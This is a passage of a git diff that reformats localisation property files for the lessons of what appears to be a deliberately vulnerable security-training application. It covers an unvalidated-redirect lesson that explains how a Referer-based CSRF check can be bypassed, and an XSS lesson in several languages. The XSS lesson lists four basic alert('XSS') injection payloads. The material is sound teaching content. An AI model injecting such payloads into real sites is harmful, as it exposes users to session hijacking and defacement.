-challenge.description=\u8981\u5B8C\u6210\u8BE5\u8BFE\u7A0B,\u4F60\u5FC5\u987B\u5229\u7528\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020(CSRF)\u6F0F\u6D1E\u4F7F\u7528\u4E00\u4E2A\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u5B89\u5168\u98CE\u9669.CSRF\u4FDD\u62A4\u5DF2\u7ECF\u88AB\u5B9E\u73B0,\u5728\u8BE5\u51FD\u6570\u4E2D\u5DF2\u7ECF\u88AB\u8BBE\u7F6E\u6210\u4E0D\u5B8C\u5168\u7684,\u5E76\u53EF\u4EE5\u901A\u8FC7\u4F7F\u7528\u672A\u9A8C\u8BC1\u91CD\u5B9A\u5411\u6F0F\u6D1E\u8F7B\u6613\u7ED5\u8FC7.\u4E3A\u4E86\u9632\u6B62CSRF\u653B\u51FB\u8BE5\u5E94\u7528\u7A0B\u5E8F\u6B63\u5728\u68C0\u67E5\u8BF7\u6C42\u7684Referer HTTP \u6807\u5934\u662F\u6765\u81EA\u4E00\u4E2A\u6B63\u5728\u8FD0\u884C\u7684\u7A0B\u5E8F\u7684\u76F8\u540C\u4E3B\u673A\u540D.\u5F53\u8BF7\u6C42\u4ECE\u7A0B\u5E8F\u5185\u59CB\u53D1,\u662F\u5F88\u5BB9\u6613\u7ED5\u8FC7\u7684.\u5F53\u4E00\u4E2A\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u88AB\u4F7F\u7528\u65F6,\u8BE5Referer\u5934\u5C06\u91CD\u5B9A\u5411\u9875\u9762\u7684URL.
-challenge.description.function=\u6613\u88AB\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u653B\u51FB\u7684\u51FD\u6570\u662F
-challenge.description.request=\u6807\u5FD7\u8BE5\u8BFE\u7A0B\u662F\u5B8C\u6210\u72B6\u6001\u7684\u8BF7\u6C42\u662F
-challenge.description.request.2=\u5F53 exampleId \u662F \u7528\u6237\u7684 TempId.
-challenge.description.id=\u4F60\u7684\u6682\u65F6 ID \u662F
-challenge.description.admin.message=\u7BA1\u7406\u5458\u4FDD\u8BC1\u67E5\u770B\u4EFB\u4F55\u4F60\u53D1\u9001\u7ED9\u4ED6\u7684\u4FE1\u606F.\u8BF7\u7528\u4EE5\u4E0B\u8868\u683C\u7ED9\u4ED6\u53D1\u9001\u6709\u8DA3\u7684\u4E1C\u897F\u5427!
-send.message.button=\u53D1\u9001\u4FE1\u606F
-word.info.loading=\u52A0\u8F7D\u4E2D...
-generic.error=\u6709\u4E00\u4E2A\u9519\u8BEF:
\ No newline at end of file
+title.question.unvalidated_redirects_forwards = \u4EC0\u4E48\u662F\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u548C\u8F6C\u53D1?
+
+paragraph.info.1 = \u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u548C\u8F6C\u53D1,\u53D1\u751F\u5728\u5F53\u5E94\u7528\u7A0B\u5E8F\u91CD\u5B9A\u5411\u6216\u8F6C\u53D1\u4ED6\u4EEC\u7684\u7528\u6237\u5230\u4E00\u4E2A\u901A\u8FC7\u4E00\u4E2A\u672A\u7ECF\u9A8C\u8BC1\u7684\u53C2\u6570\u7279\u5B9A\u7684\u76EE\u6807.\u4E00\u4E2A\u672A\u7ECF\u9A8C\u8BC1\u7684\u53C2\u6570\u88AB\u7528\u4E8E\u91CD\u5B9A\u5411\u4E00\u4E2A\u7528\u6237\u5230\u4E00\u4E2A\u901A\u5E38\u5B89\u5168\u7684\u4F4D\u7F6E,\u8BE5\u4F4D\u7F6E\u662F\u53EF\u88AB\u653B\u51FB\u8005\u7528\u4E8E\u6B3A\u9A97\u53D7\u5BB3\u8005\u53BB\u8BBF\u95EE\u9493\u9C7C\u7F51\u9875\u6216\u6709\u6076\u610F\u8F6F\u4EF6\u5B89\u88C5\u5728\u4ED6\u4EEC\u7684\u673A\u5668\u4E0A\u7684.
+paragraph.info.2 = \u8FD9\u79CD\u653B\u51FB\u5229\u7528\u7528\u6237\u5BF9\u5E94\u7528\u7A0B\u5E8F\u7684\u4FE1\u8D56. \u53D7\u5BB3\u8005\u66F4\u6709\u53EF\u80FD\u70B9\u51FB\u4E00\u4E2A\u4ED6\u4EEC\u4FE1\u8D56\u7684\u7AD9\u70B9,\u800C\u4E0D\u662F\u4E00\u4E2A\u4ED6\u4EEC\u4ECE\u672A\u89C1\u8FC7\u7684\u7AD9\u70B9\u7684\u94FE\u63A5.
+paragraph.info.3 = \u8FD9\u4E9B\u653B\u51FB\u4E5F\u53EF\u4EE5\u88AB\u7528\u4E8E\u7ED5\u8FC7\u8BBF\u95EE\u63A7\u5236\u6A21\u5F0F.\u90A3\u4E9B\u666E\u901A\u7528\u6237\u901A\u5E38\u6CA1\u6709\u88AB\u6388\u6743\u8BBF\u95EE\u7684\u9875\u9762,\u6BD4\u5982\u7BA1\u7406\u5458\u9875\u9762,\u4E5F\u5DF2\u7ECF\u5B8C\u6210\u4E86\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+
+challenge.description = \u8981\u5B8C\u6210\u8BE5\u8BFE\u7A0B,\u4F60\u5FC5\u987B\u5229\u7528\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020(CSRF)\u6F0F\u6D1E\u4F7F\u7528\u4E00\u4E2A\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u5B89\u5168\u98CE\u9669.CSRF\u4FDD\u62A4\u5DF2\u7ECF\u88AB\u5B9E\u73B0,\u5728\u8BE5\u51FD\u6570\u4E2D\u5DF2\u7ECF\u88AB\u8BBE\u7F6E\u6210\u4E0D\u5B8C\u5168\u7684,\u5E76\u53EF\u4EE5\u901A\u8FC7\u4F7F\u7528\u672A\u9A8C\u8BC1\u91CD\u5B9A\u5411\u6F0F\u6D1E\u8F7B\u6613\u7ED5\u8FC7.\u4E3A\u4E86\u9632\u6B62CSRF\u653B\u51FB\u8BE5\u5E94\u7528\u7A0B\u5E8F\u6B63\u5728\u68C0\u67E5\u8BF7\u6C42\u7684Referer HTTP \u6807\u5934\u662F\u6765\u81EA\u4E00\u4E2A\u6B63\u5728\u8FD0\u884C\u7684\u7A0B\u5E8F\u7684\u76F8\u540C\u4E3B\u673A\u540D.\u5F53\u8BF7\u6C42\u4ECE\u7A0B\u5E8F\u5185\u59CB\u53D1,\u662F\u5F88\u5BB9\u6613\u7ED5\u8FC7\u7684.\u5F53\u4E00\u4E2A\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u88AB\u4F7F\u7528\u65F6,\u8BE5Referer\u5934\u5C06\u91CD\u5B9A\u5411\u9875\u9762\u7684URL.
+challenge.description.function = \u6613\u88AB\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u653B\u51FB\u7684\u51FD\u6570\u662F
+
+challenge.description.request = \u6807\u5FD7\u8BE5\u8BFE\u7A0B\u662F\u5B8C\u6210\u72B6\u6001\u7684\u8BF7\u6C42\u662F
+challenge.description.request.2 = \u5F53 exampleId \u662F \u7528\u6237\u7684 TempId.
+challenge.description.id = \u4F60\u7684\u6682\u65F6 ID \u662F
+challenge.description.admin.message = \u7BA1\u7406\u5458\u4FDD\u8BC1\u67E5\u770B\u4EFB\u4F55\u4F60\u53D1\u9001\u7ED9\u4ED6\u7684\u4FE1\u606F.\u8BF7\u7528\u4EE5\u4E0B\u8868\u683C\u7ED9\u4ED6\u53D1\u9001\u6709\u8DA3\u7684\u4E1C\u897F\u5427!
+
+
+send.message.button = \u53D1\u9001\u4FE1\u606F
+word.info.loading = \u52A0\u8F7D\u4E2D...
+generic.error = \u6709\u4E00\u4E2A\u9519\u8BEF:
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a.properties b/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a.properties
index 049194f0c..7a0818248 100644
--- a/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a.properties
+++ b/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a.properties
@@ -1,16 +1,16 @@
-title.question.xss=What is Cross Site Scripting (XSS)?
-paragraph.info.1=Cross-Site Scripting, or XSS, issues occur when an application uses untrusted data in a web browser without sufficient validation or escaping. If untrusted data contains a client side script, the browser will execute the script while it is interpreting the page.
-paragraph.info.2=Attackers can use XSS attacks to execute scripts in a victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. Anyone that can send data to the system, including administrators, are possible candidates for performing XSS attacks in an application.
-paragraph.info.3=According to OWASP, XSS is the most widespread vulnerability found in web applications today. This is partially due to the variety of attack vectors that are available. The easiest way of showing an XSS attack executing is using a simple alert box as a client side script pay load. To execute a XSS payload, a variety of an attack vectors may be necessary to overcome insufficient escaping or validation. The following are examples of some known attack vectors, that all create the same alert pop up that reads "XSS".
-example.xss.1=<script>alert('XSS')</script>
-example.xss.2=<img src="#" onerror="alert('XSS')" />
-example.xss.3=<input type="button" onclick="alert('XSS')" />
-example.xss.4=<iframe src="javascript:alert('XSS');"></iframe>
-paragraph.whattodo.xss=The following search box outputs untrusted data without any validation or escaping. Get an alert box to execute through this function to show that there is an XSS vulnerability present.
-paragraph.info.searchTerm=Please enter the Search Term that you want to look up
-word.info.loading=Loading...
-sentence.question.wouldYouLikeHint=Would you like a hint?
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-button.getUser=Get This User
-error.occurred=An Error Occurred
\ No newline at end of file
+title.question.xss = What is Cross Site Scripting (XSS)?
+paragraph.info.1 = Cross-Site Scripting, or XSS, issues occur when an application uses untrusted data in a web browser without sufficient validation or escaping. If untrusted data contains a client side script, the browser will execute the script while it is interpreting the page.
+paragraph.info.2 = Attackers can use XSS attacks to execute scripts in a victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. Anyone that can send data to the system, including administrators, are possible candidates for performing XSS attacks in an application.
+paragraph.info.3 = According to OWASP, XSS is the most widespread vulnerability found in web applications today. This is partially due to the variety of attack vectors that are available. The easiest way of showing an XSS attack executing is using a simple alert box as a client side script pay load. To execute a XSS payload, a variety of an attack vectors may be necessary to overcome insufficient escaping or validation. The following are examples of some known attack vectors, that all create the same alert pop up that reads "XSS".
+example.xss.1 = <script>alert('XSS')</script>
+example.xss.2 = <img src="#" onerror="alert('XSS')" />
+example.xss.3 = <input type="button" onclick="alert('XSS')" />
+example.xss.4 = <iframe src="javascript:alert('XSS');"></iframe>
+paragraph.whattodo.xss = The following search box outputs untrusted data without any validation or escaping. Get an alert box to execute through this function to show that there is an XSS vulnerability present.
+paragraph.info.searchTerm = Please enter the Search Term that you want to look up
+word.info.loading = Loading...
+sentence.question.wouldYouLikeHint = Would you like a hint?
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+button.getUser = Get This User
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_es.properties b/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_es.properties
index e5ad2dee1..c4d1b5c30 100644
--- a/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_es.properties
+++ b/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_es.properties
@@ -1,16 +1,16 @@
-title.question.xss=¿Que es secuencia de comandos en sitios cruzados (XSS)?
-paragraph.info.1=Cross-Site Scripting, or XSS, issues occur when an application uses untrusted data in a web browser without sufficient validation or escaping. If untrusted data contains a client side script, the browser will execute the script while it is interpreting the page.
-paragraph.info.2=Attackers can use XSS attacks to execute scripts in a victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. Anyone that can send data to the system, including administrators, are possible candidates for performing XSS attacks in an application.
-paragraph.info.3=According to OWASP, XSS is the most widespread vulnerability found in web applications today. This is partially due to the variety of attack vectors that are available. The easiest way of showing an XSS attack executing is using a simple alert box as a client side script pay load. To execute a XSS payload, a variety of an attack vectors may be necessary to overcome insufficient escaping or validation. The following are examples of some known attack vectors, that all create the same alert pop up that reads "XSS".
-example.xss.1=<script>alert('XSS')</script>
-example.xss.2=<img src="#" onerror="alert('XSS')" />
-example.xss.3=<input type="button" onclick="alert('XSS')" />
-example.xss.4=<iframe src="javascript:alert('XSS');"></iframe>
-paragraph.whattodo.xss=The following search box outputs untrusted data without any validation or escaping. Get an alert box to execute through this function to show that there is an XSS vulnerability present.
-paragraph.info.searchTerm=Please enter the Search Term that you want to look up
-word.info.loading=Loading...
-sentence.question.wouldYouLikeHint=Would you like a hint?
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-button.getUser=Get This User
-error.occurred=An Error Occurred
\ No newline at end of file
+title.question.xss = ¿Que es secuencia de comandos en sitios cruzados (XSS)?
+paragraph.info.1 = Cross-Site Scripting, or XSS, issues occur when an application uses untrusted data in a web browser without sufficient validation or escaping. If untrusted data contains a client side script, the browser will execute the script while it is interpreting the page.
+paragraph.info.2 = Attackers can use XSS attacks to execute scripts in a victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. Anyone that can send data to the system, including administrators, are possible candidates for performing XSS attacks in an application.
+paragraph.info.3 = According to OWASP, XSS is the most widespread vulnerability found in web applications today. This is partially due to the variety of attack vectors that are available. The easiest way of showing an XSS attack executing is using a simple alert box as a client side script pay load. To execute a XSS payload, a variety of an attack vectors may be necessary to overcome insufficient escaping or validation. The following are examples of some known attack vectors, that all create the same alert pop up that reads "XSS".
+example.xss.1 = <script>alert('XSS')</script>
+example.xss.2 = <img src="#" onerror="alert('XSS')" />
+example.xss.3 = <input type="button" onclick="alert('XSS')" />
+example.xss.4 = <iframe src="javascript:alert('XSS');"></iframe>
+paragraph.whattodo.xss = The following search box outputs untrusted data without any validation or escaping. Get an alert box to execute through this function to show that there is an XSS vulnerability present.
+paragraph.info.searchTerm = Please enter the Search Term that you want to look up
+word.info.loading = Loading...
+sentence.question.wouldYouLikeHint = Would you like a hint?
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+button.getUser = Get This User
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_ga.properties b/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_ga.properties
index 3b371550d..d2a4160b7 100644
--- a/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_ga.properties
+++ b/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_ga.properties
@@ -1,16 +1,16 @@
-title.question.xss=Cád é Trasna Suíomh Script (XSS)?
-paragraph.info.1=Trasna Suíomh Script, nó XSS, tharlaíonn saincheisteanna nuair Úsáideann iarratas sonraí neamhiontaofa i bhrabhsálaí gréasáin gan dóthain bailíochtaithe nó éalú . Má tá na sonraí neamhiontaofa script taobh cliant, beidh an bhrabhsálaí fhorghníomhú an script cé go bhfuil sé ag léiriú an leathanach.
-paragraph.info.2=Is féidir le attackers a úsáid ionsaithe XSS chun scripteanna i bhrabhsálaí íospartach ar féidir a hijack seisiúin úsáideora fhorghníomhú, aghlot suímh ghréasáin, nó atreorú an t-úsáideoir le láithreáin mailíseach. Tá duine ar bith gur féidir sonraí a sheoladh chuig an gcóras, lena n-áirítear riarthóirí, iarrthóirí féideartha le haghaidh chomhlíonadh ionsaithe XSS in iarratas.
-paragraph.info.3=De réir OWASP, is é XSS an leochaileacht is forleithne le fáil i iarratais gréasáin lá atá inniu ann. Tá sé seo i bpáirt mar gheall ar an éagsúlacht na veicteoirí ionsaí atá ar fáil. An bealach is éasca a léiriú ionsaí XSS forghníomhaitheach go bhfuil baint úsáide as simplí bosca foláirimh mar ualach a íoc script taobh cliant. A fhorghníomhú pálasta XSS, féadfaidh éagsúlacht de veicteoirí ionsaí a bheith riachtanach a shárú nach leor éalú nó bailíochtú. Na samplaí de roinnt veicteoirí ionsaí ar a dtugtar iad seo a leanas, a chruthú go léir an airdeall céanna pop suas go léann "XSS".
-example.xss.1=<script>alert('XSS')</script>
-example.xss.2=<img src="#" onerror="alert('XSS')" />
-example.xss.3=<input type="button" onclick="alert('XSS')" />
-example.xss.4=<iframe src="javascript:alert('XSS');"></iframe>
-paragraph.whattodo.xss=Na haschuir bosca cuardaigh a leanas sonraí neamhiontaofa gan aon bhailíochtú nó éalú. Faigh bosca foláirimh a fhorghníomhú tríd an fheidhm seo a thaispeáint go bhfuil an leochaileacht XSS láthair.
-paragraph.info.searchTerm=Cuir isteach an Téarma Cuardaigh gur mian leat chun breathnú suas
-word.info.loading=Lódáil...
-sentence.question.wouldYouLikeHint=Ar mhaith leat leid?
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-button.getUser=Get This User
-error.occurred=An Error Occurred
\ No newline at end of file
+title.question.xss = Cád é Trasna Suíomh Script (XSS)?
+paragraph.info.1 = Trasna Suíomh Script, nó XSS, tharlaíonn saincheisteanna nuair Úsáideann iarratas sonraí neamhiontaofa i bhrabhsálaí gréasáin gan dóthain bailíochtaithe nó éalú . Má tá na sonraí neamhiontaofa script taobh cliant, beidh an bhrabhsálaí fhorghníomhú an script cé go bhfuil sé ag léiriú an leathanach.
+paragraph.info.2 = Is féidir le attackers a úsáid ionsaithe XSS chun scripteanna i bhrabhsálaí íospartach ar féidir a hijack seisiúin úsáideora fhorghníomhú, aghlot suímh ghréasáin, nó atreorú an t-úsáideoir le láithreáin mailíseach. Tá duine ar bith gur féidir sonraí a sheoladh chuig an gcóras, lena n-áirítear riarthóirí, iarrthóirí féideartha le haghaidh chomhlíonadh ionsaithe XSS in iarratas.
+paragraph.info.3 = De réir OWASP, is é XSS an leochaileacht is forleithne le fáil i iarratais gréasáin lá atá inniu ann. Tá sé seo i bpáirt mar gheall ar an éagsúlacht na veicteoirí ionsaí atá ar fáil. An bealach is éasca a léiriú ionsaí XSS forghníomhaitheach go bhfuil baint úsáide as simplí bosca foláirimh mar ualach a íoc script taobh cliant. A fhorghníomhú pálasta XSS, féadfaidh éagsúlacht de veicteoirí ionsaí a bheith riachtanach a shárú nach leor éalú nó bailíochtú. Na samplaí de roinnt veicteoirí ionsaí ar a dtugtar iad seo a leanas, a chruthú go léir an airdeall céanna pop suas go léann "XSS".
+example.xss.1 = <script>alert('XSS')</script>
+example.xss.2 = <img src="#" onerror="alert('XSS')" />
+example.xss.3 = <input type="button" onclick="alert('XSS')" />
+example.xss.4 = <iframe src="javascript:alert('XSS');"></iframe>
+paragraph.whattodo.xss = Na haschuir bosca cuardaigh a leanas sonraí neamhiontaofa gan aon bhailíochtú nó éalú. Faigh bosca foláirimh a fhorghníomhú tríd an fheidhm seo a thaispeáint go bhfuil an leochaileacht XSS láthair.
+paragraph.info.searchTerm = Cuir isteach an Téarma Cuardaigh gur mian leat chun breathnú suas
+word.info.loading = Lódáil...
+sentence.question.wouldYouLikeHint = Ar mhaith leat leid?
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+button.getUser = Get This User
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_zh.properties b/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_zh.properties
index 482faca44..d027e53eb 100644
--- a/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_zh.properties
+++ b/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_zh.properties
@@ -1,18 +1,18 @@
-title.question.xss=\u4EC0\u4E48\u662F\u8DE8\u7AD9\u811A\u672C\u653B\u51FB (XSS)
-paragraph.info.1=\u8DE8\u7AD9\u811A\u672C\u653B\u51FB (XSS) \u7684\u53D1\u751F\u662F\u5F53\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u5728 WEB \u6D4F\u89C8\u5668\u4E2D\u4F7F\u7528\u4E0D\u53EF\u9760\u7684\u6570\u636E\uFF0C\u6CA1\u6709\u8DB3\u591F\u7684\u9A8C\u8BC1 \u6216 \u8F6C\u4E49.\u5982\u679C\u4E0D\u53EF\u9760\u7684\u6570\u636E\u5305\u542B\u5BA2\u6237\u7AEF\u7684\u4EE3\u7801,\u6D4F\u89C8\u5668\u5C06\u6267\u884C\u8BE5\u811A\u672C\uFF0C\u5F53\u5B83\u8BFB\u53D6\u8BE5\u9875\u9762\u65F6.
-paragraph.info.2=\u653B\u51FB\u8005\u53EF\u4EE5\u4F7F\u7528XSS\u653B\u51FB\u6765\u6267\u884C\u5728\u53D7\u5BB3\u8005\u7684\u6D4F\u89C8\u5668\u7684\u811A\u672C,\u5B83\u53EF\u4EE5\u52AB\u6301\u7528\u6237\u4F1A\u8BDD,\u7834\u574F\u7F51\u7AD9,\u6216\u8005\u5C06\u7528\u6237\u91CD\u5B9A\u5411\u5230\u4EFB\u610F\u6076\u610F\u7F51\u7AD9.\u53EF\u4EE5\u5C06\u6570\u636E\u53D1\u9001\u5230\u7CFB\u7EDF\u7684\u4EFB\u4F55\u4EBA,\u5305\u62EC\u7BA1\u7406\u5458,\u90FD\u53EF\u7528\u6765\u5728\u5E94\u7528\u7A0B\u5E8F\u4E2D\u6267\u884C\u8DE8\u7AD9\u811A\u672C\u653B\u51FB.
-paragraph.info.3=\u6839\u636EOWASP\uFF0CXSS\u662F\u76EE\u524D\u5728Web\u5E94\u7528\u7A0B\u5E8F\u4E2D\u6700\u666E\u904D\u7684\u6F0F\u6D1E.\u8FD9\u90E8\u5206\u662F\u7531\u4E8E\u53EF\u4F7F\u7528\u7684\u653B\u51FB\u5A92\u4ECB.\u800C\u663E\u793AXSS\u653B\u51FB\u662F\u5426\u6267\u884C\u7684\u6700\u7B80\u5355\u7684\u65B9\u6CD5\u662F\u4F7F\u7528\u4E00\u4E2A\u8B66\u544A\u8B66\u544A\u6846\u4F5C\u4E3A\u5BA2\u6237\u7AEF\u811A\u672C\u6709\u6548\u8D1F\u8F7D.\u8981\u6267\u884C\u4E00\u4E2AXSS\u6709\u6548\u8D1F\u8F7D,\u4E00\u4E2A\u653B\u51FB\u5411\u91CF\u7684\u591A\u6837\u5316\u5C06\u53EF\u80FD\u662F\u5FC5\u8981\u7684\u7528\u4EE5\u514B\u670D\u4E0D\u8DB3\u7684\u8F6C\u4E49\u6216\u9A8C\u8BC1.\u4EE5\u4E0B\u662F\u4E00\u4E9B\u5DF2\u77E5\u7684\u653B\u51FB\u6E90\u7684\u4F8B\u5B50,\u4ED6\u4EEC\u90FD\u5F39\u51FA\u76F8\u540C\u7684alert\u7A97\u53E3,\u4E0A\u9762\u5199\u7740\u201CXSS\u201D.
-example.xss.1=<SCRIPT>alert('XSS')</SCRIPT>
-example.xss.2=<IMG SRC="#" ONERROR="alert('XSS')"/>
-example.xss.3=<INPUT TYPE="BUTTON" ONCLICK="alert('XSS')"/>
-example.xss.4=<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
-paragraph.whattodo.xss=\u4EE5\u4E0B\u8FD9\u4E9B\u641C\u7D22\u680F\u8F93\u51FA\u4E0D\u53EF\u4FE1\u7684\u6570\u636E,\u6CA1\u6709\u4EFB\u4F55\u7684\u9A8C\u8BC1\u548C\u8F6C\u4E49,\u901A\u8FC7\u8FD9\u4E9B\u529F\u80FD\u4F7F\u4E00\u4E2A\u8B66\u544A\u6846\u5F97\u4EE5\u6267\u884C,\u6765\u663E\u793A\u6709\u4E00\u4E2A\u8DE8\u7AD9\u811A\u672C\u653B\u51FB\u6F0F\u6D1E\u5B58\u5728.
-paragraph.info.searchTerm=\u8BF7\u8F93\u5165\u60A8\u8981\u67E5\u627E\u7684\u5173\u952E\u5B57\u641C\u7D22
-sentence.question.wouldYouLikeHint=\u9700\u8981\u63D0\u793A\u5417?
-word.info.loading=\u52A0\u8F7D\u4E2D...
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-button.getUser=\u83B7\u53D6\u8FD9\u4E2A\u7528\u6237
-error.occurred=\u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
+title.question.xss = \u4EC0\u4E48\u662F\u8DE8\u7AD9\u811A\u672C\u653B\u51FB (XSS)
+paragraph.info.1 = \u8DE8\u7AD9\u811A\u672C\u653B\u51FB (XSS) \u7684\u53D1\u751F\u662F\u5F53\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u5728 WEB \u6D4F\u89C8\u5668\u4E2D\u4F7F\u7528\u4E0D\u53EF\u9760\u7684\u6570\u636E\uFF0C\u6CA1\u6709\u8DB3\u591F\u7684\u9A8C\u8BC1 \u6216 \u8F6C\u4E49.\u5982\u679C\u4E0D\u53EF\u9760\u7684\u6570\u636E\u5305\u542B\u5BA2\u6237\u7AEF\u7684\u4EE3\u7801,\u6D4F\u89C8\u5668\u5C06\u6267\u884C\u8BE5\u811A\u672C\uFF0C\u5F53\u5B83\u8BFB\u53D6\u8BE5\u9875\u9762\u65F6.
+paragraph.info.2 = \u653B\u51FB\u8005\u53EF\u4EE5\u4F7F\u7528XSS\u653B\u51FB\u6765\u6267\u884C\u5728\u53D7\u5BB3\u8005\u7684\u6D4F\u89C8\u5668\u7684\u811A\u672C,\u5B83\u53EF\u4EE5\u52AB\u6301\u7528\u6237\u4F1A\u8BDD,\u7834\u574F\u7F51\u7AD9,\u6216\u8005\u5C06\u7528\u6237\u91CD\u5B9A\u5411\u5230\u4EFB\u610F\u6076\u610F\u7F51\u7AD9.\u53EF\u4EE5\u5C06\u6570\u636E\u53D1\u9001\u5230\u7CFB\u7EDF\u7684\u4EFB\u4F55\u4EBA,\u5305\u62EC\u7BA1\u7406\u5458,\u90FD\u53EF\u7528\u6765\u5728\u5E94\u7528\u7A0B\u5E8F\u4E2D\u6267\u884C\u8DE8\u7AD9\u811A\u672C\u653B\u51FB.
+paragraph.info.3 = \u6839\u636EOWASP\uFF0CXSS\u662F\u76EE\u524D\u5728Web\u5E94\u7528\u7A0B\u5E8F\u4E2D\u6700\u666E\u904D\u7684\u6F0F\u6D1E.\u8FD9\u90E8\u5206\u662F\u7531\u4E8E\u53EF\u4F7F\u7528\u7684\u653B\u51FB\u5A92\u4ECB.\u800C\u663E\u793AXSS\u653B\u51FB\u662F\u5426\u6267\u884C\u7684\u6700\u7B80\u5355\u7684\u65B9\u6CD5\u662F\u4F7F\u7528\u4E00\u4E2A\u8B66\u544A\u8B66\u544A\u6846\u4F5C\u4E3A\u5BA2\u6237\u7AEF\u811A\u672C\u6709\u6548\u8D1F\u8F7D.\u8981\u6267\u884C\u4E00\u4E2AXSS\u6709\u6548\u8D1F\u8F7D,\u4E00\u4E2A\u653B\u51FB\u5411\u91CF\u7684\u591A\u6837\u5316\u5C06\u53EF\u80FD\u662F\u5FC5\u8981\u7684\u7528\u4EE5\u514B\u670D\u4E0D\u8DB3\u7684\u8F6C\u4E49\u6216\u9A8C\u8BC1.\u4EE5\u4E0B\u662F\u4E00\u4E9B\u5DF2\u77E5\u7684\u653B\u51FB\u6E90\u7684\u4F8B\u5B50,\u4ED6\u4EEC\u90FD\u5F39\u51FA\u76F8\u540C\u7684alert\u7A97\u53E3,\u4E0A\u9762\u5199\u7740\u201CXSS\u201D.
+example.xss.1 = <SCRIPT>alert('XSS')</SCRIPT>
+example.xss.2 = <IMG SRC="#" ONERROR="alert('XSS')"/>
+example.xss.3 = <INPUT TYPE="BUTTON" ONCLICK="alert('XSS')"/>
+example.xss.4 = <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
+paragraph.whattodo.xss = \u4EE5\u4E0B\u8FD9\u4E9B\u641C\u7D22\u680F\u8F93\u51FA\u4E0D\u53EF\u4FE1\u7684\u6570\u636E,\u6CA1\u6709\u4EFB\u4F55\u7684\u9A8C\u8BC1\u548C\u8F6C\u4E49,\u901A\u8FC7\u8FD9\u4E9B\u529F\u80FD\u4F7F\u4E00\u4E2A\u8B66\u544A\u6846\u5F97\u4EE5\u6267\u884C,\u6765\u663E\u793A\u6709\u4E00\u4E2A\u8DE8\u7AD9\u811A\u672C\u653B\u51FB\u6F0F\u6D1E\u5B58\u5728.
+paragraph.info.searchTerm = \u8BF7\u8F93\u5165\u60A8\u8981\u67E5\u627E\u7684\u5173\u952E\u5B57\u641C\u7D22
+sentence.question.wouldYouLikeHint = \u9700\u8981\u63D0\u793A\u5417?
+word.info.loading = \u52A0\u8F7D\u4E2D...
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
